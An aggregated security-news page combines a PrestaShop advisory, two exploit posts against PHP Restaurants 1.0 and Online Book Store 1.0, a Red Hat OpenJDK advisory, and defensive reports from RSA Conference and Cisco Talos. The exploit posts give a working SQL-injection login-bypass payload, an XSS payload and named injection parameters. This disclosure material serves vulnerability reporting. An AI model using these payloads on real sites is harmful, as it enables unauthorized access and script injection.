### Impact
It is possible for a user having access to the SQL Manager (Advanced Options -> Database) to arbitrary read any file on the Operating system when using SQL function LOAD_FILE in a SELECT request. So It can access to critical information.

### Patches
The patch will be on PS 8.0.4 and PS 1.7.8.9


**Arbitrary file read via SQL injection**

High severity GitHub Reviewed Published Apr 25, 2023 in PrestaShop/PrestaShop • Updated Apr 26, 2023

GHSA-8r4m-5p6p-52rp: Arbitrary file read via SQL injection

PHP Restaurants version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass and a cross site scripting vulnerability. Original discovery of SQL injection in this version is attributed to Nefrit ID in February of 2022.

    # Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & CrossSite Scripting# Google Dork: None# Date: 4/26/2023# Exploit Author: Or4nG.M4n# Vendor Homepage: https://github.com/jcwebhole# Software Link: https://github.com/jcwebhole/php_restaurants# Version: 1.0functions.phpfunction login(){global $conn;$email = $_POST['email'];$pw = $_POST['password'];$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` ='".md5($pw)."'"; <-- there is No filter to secure sql queryparm[email][password]$result = $conn->query($sql);if ($result->num_rows > 0) {while($row = $result->fetch_assoc()) {setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 dayheader('location: index.php');}} else {header('location: login.php?m=Wrong Password');}}login bypass at admin page /rest1/admin/login.phpemail & password : ' OR 1=1 --             <- add [space] end of the payloadcross site scripting main page /index.phpxhttp.open("GET", "functions.php?f=getRestaurants<?php  if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here wecan insert our xss payload?>  ", true);xhttp.send();</script> <-- when you insert your'e payload don't forget to add </script>likexss payload : </script><img onerror=alert(1) src=a>

PHP Restaurants 1.0 SQL Injection / Cross Site Scripting

Online Book Store version 1.0 suffers from a remote SQL injection vulnerability. This is a variant of the original vulnerability discovered in August of 2020 by Moaaz Taha.

    # Exploit Title: Online Book Store 1.0 - (process.php) SQL injection# Google Dork: 4/26/2023# Exploit Author: Or4nG.M4n# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip# Version: 1.0* STEPS *1- go to any book and add it to cart2- after that u will redirected to /cart.php3- click on Go To Checkout /checkout.php4- inject your'e injecton code in any of this post parametersparameters : name  address city zip_code country  foreach($_SESSION['cart'] as $isbn => $qty){    $bookprice = getbookprice($isbn);    $query = "INSERT INTO order_items VALUES <====== 1    ('$orderid', '$isbn', '$bookprice', '$qty')"; <====== 2    $result = mysqli_query($conn, $query); <====== 3    if(!$result){      echo "Insert value false!" . mysqli_error($conn2); <====== 4      exit;    }  }

Online Book Store 1.0 SQL Injection

Red Hat Security Advisory 2023-1895-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-11-openjdk security update  
Advisory ID:       RHSA-2023:1895-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1895  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-11-openjdk-11.0.19.0.7-1.el8_7.src.rpm

aarch64:  
java-11-openjdk-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.s390x.rpm

x86_64:  
java-11-openjdk-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsMNzjgjWX9erEAQhqvw//WhLH9EibD9Wg9khIm+puypctGFF/sImh  
pUeoQmiaLk6YDvesqljArPjZnwA/4+jeTym8jczhJV9rBV9f4/LN4l/uGBNkiWtK  
pebt8SKFVrkIYyH6zos1vyMRNe937u9SgkvCyKbSFhPmCziDy2XaA2XL6ub+YWFn  
/1CNvy9wERStSpYQMonsH0fU+Fd/bmF/R2y6X7MfUEsCllKyjlxZ1lFkEpPoGHrh  
p4hIOA8hPxPoAJ4ThVTqCSVSv01B/YBiCmR10WnoWir7wj+pU3hEbuAPQs08CnqB  
tkLk1aaE68wAh2CMcblJK66w55SpHR6cot0qNa8F7z8MX3YuVwiIBDSGlCJ6Smnu  
ON8HNdn29JZ9Kj5apdi0edaX/ZZ0lP2KdeC22DIYtNz4h7G028MwB0YR9/Sh7wlx  
f3pYVeQZlKTOsl9pTFjgRaOesHhznS1S2Fe2ClOjCP6nltvq+paRCOy8jL2ZHc9b  
/2XCt7BHbWT4vUPO0gUpuJaVOrVBFuJxBOo1kpu1g/xsw7SlcuG+nCGAyLZ0WnlK  
SftlYMUiSNViMEBg4gGBj+nPrmISyfdyCUfEkPpxqcHFhiv3u309cBKZ0fWhXl1Q  
SAlH+hZuxFAnlgw1RuNCTxW9WEIydCtj/tASL6izRPJK/BX0VRZoAQUshCB0QlWy  
C1cyOJPSxKs=  
=4BgK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1895-01

Last year, 71% of enterprise breaches were pulled off quietly, with legitimate tools, research shows.

RSA CONFERENCE 2023 – San Francisco – With little more than smart reconnaissance and existing tools, adversaries are increasingly capable of compromising an enterprise network without making any noise or leaving a trace behind.

In fact, according to CrowdStrike CEO Jeff Hurtz and president Michael Sentonas, 71% of enterprise cyberattacks in calendar year 2022 were done without malware.

At this year's RSA Conference, Hurtz and Sentonas returned to the keynote stage to walk the audience through a case study of just how easily a threat actor can not just penetrate a network but also move laterally and persist without making a ripple, illustrating in stark terms the kind of challenge cybersecurity teams face trying to detect, much less mitigate, malwareless compromises.

The legendary cybersecurity duo profiled the "Spider" cybercrime group from the stage as a perfect example of the phenomenon.

"They're very well prepared, and they are very well resourced," Sentonas explained. "And they really like to leverage existing tools; there's no need to get fancy if you can just blend in."

**Spider: Anatomy of a Malwareless Attack**

First, Spider initiates an in-depth intelligence gathering effort. Hurtz said his team was able to establish the threat actor spent more than an hour on the phone with the victim company's help desk trying to get any insights that could fuel the next phase of social engineering. 

Once they had a specific user in their sights, Spider initiates a voice call informing the user their credentials had been compromised. Victims are then sent a malicious link and prompted to enter in not just their login details, but also their multifactor authentication (MFA) data. Once the user is tricked into handing those over, Spider is off and running.

"We call that the layer A problem," Hurtz joked, about the user handing over the goods. "It's between the chair and the keyboard."

Spider then uses the Tails operating system and Evilginx2 to compromise the user's credentials to set up an AnyDesk account controlled by the cyberattackers. AnyDesk remains a popular remote desktop tool among threat actors, Hurtz added.

Spider also uses dedicated machines that hide their identity, and run their code on hardware as much as possible to avoid detection. "It could be from anywhere," Sentonas said. "It blends in because its not going to come from some crazy domain."

Other tools, like DigitalOcean Droplet, used as a virtual machine, fill out the attack chain. Ultimately, Hurtz and Sentonas explained, the Spider attack ends with the persistent actor set up with their own users on the network, free and able to exfiltrate data at will. And importantly, Sentonas noted, if the threat actor can get into the on-premises network, the cloud is likely going to sync and become compromised as well.

Importantly, Sentonas and Hurtz wanted to disabuse the audience of the notion that threat actors need full admin access to set up new users. They don't, and Sentonas showed exactly how just delegated permissions could allow him to move freely about the company's customer relationship management system, as well as add themselves as a SQL server admin.

In the past couple of quarters, CrowdStrike has been dealing with about one enterprise per week reeling from this type of malware-free cyberattack, Sentonas said.

**How to Defend Against Malware-Free Cyberattacks**

When it comes to defending the enterprise, endpoint detection and response (EDR) and other malware detection tools aren't terribly useful against malware-free cyberattacks. There's simply no malicious code to detect.

Instead, Hurtz and Sentonas urged enterprises to focus on gathering as much telemetry as possible from the endpoint to the cloud and managing identity down to the tiniest details.

But gathering all that telemetry and identity data leaves teams with vast oceans of information that's not particularly useable for threat hunting. That's where artificial intelligence (AI) and machine learning (ML) can be meaningfully deployed to look for anomalous activity, like added user accounts, to detect malicious activity, without malicious code.

It's also important to protect the enterprise MFA service from compromise, they added.

"Maintain good identity store hygiene, Sentonas said. "And protect the services you use for MFA."

Malware-Free Cyberattacks Are On the Rise; Here's How to Detect Them

In 45 percent of engagements, attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter.

Wednesday, April 26, 2023 08:04

**Web shell usage spikes in Q1 compared to previous quarters, correlating with higher instances of exploitation of public-facing applications.**

In a novel increase compared to previous quarters, Cisco Talos Incident Response (Talos IR) reports that web shells were the most-observed threat in the first quarter of 2023, comprising nearly a fourth of the incidents Talos IR engaged in. The functionality of these web shells and the specific vulnerabilities and weaknesses in the platforms they targeted varied. Although each web shell had its own sets of basic functions, when there were multiple web shells present in a single engagement, threat actors chained them together to provide a more flexible toolkit for spreading access across the network. This demonstrates the skills actors have in combining multiple means of accesses and tools and increases the liklihood that they will be able to deploy additional malware or obtain sensitive and private information.

Ransomware made up a smaller portion of threats observed this quarter than in the past, from 20% to around 10%. Given that Talos IR observed a recent surge of ransomware incidents at the end of the quarter that did not close off, this decrease does not necessarily signify a decline in general ransomware activity as much as it is a reflection of activity seen against Talos IR’s customer base. However, ransomware and pre-ransomware incidents combined made up more than 20 percent of threats observed. While it can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place, many of the pre-ransomware engagements featured activity associated with prominent ransomware groups, such as Vice Society. We note that in this quarter, particularly in an aforementioned Vice Society engagement, swift action from defenders at victim organizations as well as Talos IR helped mitigate malicious activity before encryption could occur.

This quarter also featured previously seen commodity loaders, such as Qakbot. In engagements this quarter, Qakbot leveraged malicious OneNote documents, consistent with an uptick in various malware distributing weaponized Microsoft Office OneNote attachments. This is evidence of an ongoing trend of threat actors experimenting with file types that do not rely on macros to deliver malicious payloads following Microsoft’s move to start disabling macros by default in its applications in July 2022.

In 45 percent of engagements, attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter. In many of these engagements, web shell usage contributed to this uptick where adversaries were attempting to compromise web-based servers exposed to the internet.

**Targeting**

Health care and public health was the most targeted vertical this quarter, closely followed by the retail and trade, real estate and food services/accommodation sectors, including hospitality.

**Web shell usage spike, featuring activity from FIN13**

Since January 2023, Talos IR observed an increase in web shell usage from 6% of all threats last quarter to now comprising nearly 25% of all threats. Web shells are malicious scripts that enable threat actors to compromise web-based servers exposed to the internet. This quarter, Talos observed threat actors using publicly available or modified web shells coded in various languages, including PHP, ASP.NET and Perl. After leveraging web shells to establish a foothold and gain persistent access to a system, adversaries remotely executed arbitrary code or commands, moved laterally within the network, or delivered additional malicious payloads. In many of these web shell incidents, adversaries relied heavily on web shell code sourced from publicly available GitHub repositories. This finding is also in line with a trend observed from Talos IR engagements from July to September 2022 (Q3 2022), where adversaries used a variety of open-source tools and scripts hosted on GitHub repositories to support operations across multiple stages of the attack lifecycle.

In one cluster of web shell activity, Talos observed targeting patterns and tactics, techniques and procedures (TTPs) potentially associated with the FIN13 cybercriminal threat actor, a significant finding in Talos IR engagements given FIN13’s targeted behavior. The web shells with known FIN13 TTPs have varying levels of functionality which include allowing queries to Microsoft SQL (MS-SQL) instances, creating reverse shell connection(s) to external IP addresses, and executing PHP scripts which can be used as a proxy to connect to other services. Consistent with public reporting on FIN13, Talos IR observed a PHP-based web shell (“404.php”) that took an IP or DNS entry and a port and attempted to create a proxy connection. The second web shell (“ms3.aspx”) was Windows-based and allowed SQL connections to an internal server and, if successful, results would be rendered in the browser. The third was another PHP-based web shell (“re.php”) that conducted port scans and created an outbound socket to respond/exfiltrate data to the attacker. This specific web shell contained a hardcoded IP address which resolved to cloud service provider DigitalOcean. The final web shell (“tx.asp”) was a Windows-based web shell that used “wscript.shell” and exec() to run commands rendered to the screen via an HTML document. While each web shell on its own had basic functionality, by chaining them together, the actor created a flexible toolkit for spreading their access across the network, while providing a proxy for exfiltrating sensitive data.

While the exact reason for this quarter’s increased appearance of web shells is unknown, their recent increased popularity may potentially be related to the ease of obtaining their code through open-source repositories. The availability of and easy access to open-source web shell code, paired with systems that may be publicly exposed or have poorly managed patching, make the use of web shells a lucrative option.

**Ransomware**

Ransomware made up a much smaller portion of threats this quarter, from 20% of threats to 10%. Looking ahead, there was a recent spike in ransomware engagements which we expect to level out again next quarter. Combined, ransomware and pre-ransomware incidents made up over 20 percent of threats observed.

In a Phobos ransomware engagement, a threat that Talos IR has responded to since 2020, the initial access likely involved remote desktop protocol (RDP). The adversary deployed a file named “mimidrv.sys," which is a signed Windows kernel mode software driver meant to be used with the Mimikatz executable. Talos IR also identified seven startup items that included downloading the ransomware executable, “Fast.exe.” This is a common persistence technique that followed activity where the adversary made modifications to the registry on the customer’s Amazon Relational Database Service (RDS) server. Upon encryption, attackers encrypted the files, appending them with the “.faust” extension and dropped a ransom note on the targeted systems.

This quarter also featured the Daixin ransomware, a newer ransomware-as-a-service (RaaS) family that Talos IR had never seen before in an engagement. Daixin, which first emerged in June 2022, typically involves affiliates gaining access to victim systems through virtual private networks (VPN) servers or by exploiting unpatched vulnerabilities, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA). In a Daixin ransomware engagement, the affiliate modified registry values, mapped network shares, and ran randomly named BAT files as services on the system. Talos IR also identified the Impacket toolset, a collection of Python classes for working with different network protocols, and a PowerShell script loading a Cobalt Strike payload which subsequently launched a Cobalt Strike shellcode listening on port 4444.

We assess that the recent law enforcement efforts to disrupt ransomware actors will create space for new groups to emerge, consistent with a pattern that has been ongoing for years. In January 2023, the U.S. Department of Justice announced a months-long disruption campaign against the Hive ransomware group. The FBI, along with foreign law enforcement partners, seized Hive servers after entering its networks and capturing keys to decrypt its software, effectively disrupting operations. We have not observed Hive ransomware in Talos IR engagements since August 2022, a likely indication that Hive operations have ceased while former members possibly look to join other groups or rebrand under new names.

**Malicious OneNote documents continue to be leveraged in engagements this quarter**

The Qakbot commodity loader was observed across engagements this quarter leveraging ZIP files containing malicious OneNote documents, consistent with endpoint telemetry and public reporting on threats leveraging OneNote documents in phishing emails starting at the end of 2022 and early 2023. In one Qakbot engagement, a ZIP file ("Inv\_02\_02\_#3.zip") was detected as Qakbot and contained a malicious OneNote document which attempted to lure a user to click “open” containing a malicious embedded URL.

While Talos IR did not respond to any Emotet incidents this quarter, Emotet reemerged in March 2023, resuming its spam operations after a months-long hiatus. In a relatively short period, Emotet modified its infection chain several times to maximize the likelihood of successfully infecting victims. By mid-March, Emotet had switched to distributing malicious OneNote documents, highlighting the ways in which threat actors will continue to identify and quickly implement updated delivery methods to infect victims.

**Initial vectors**

This quarter featured 45 percent of engagements where attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter. In many of these engagements, web shell usage contributed to this uptick where adversaries were attempting to compromise web-based servers exposed to the internet. Valid accounts and/or accounts with weak passwords or single-factor authentication also helped facilitate initial access where an adversary was leveraging compromised credentials.

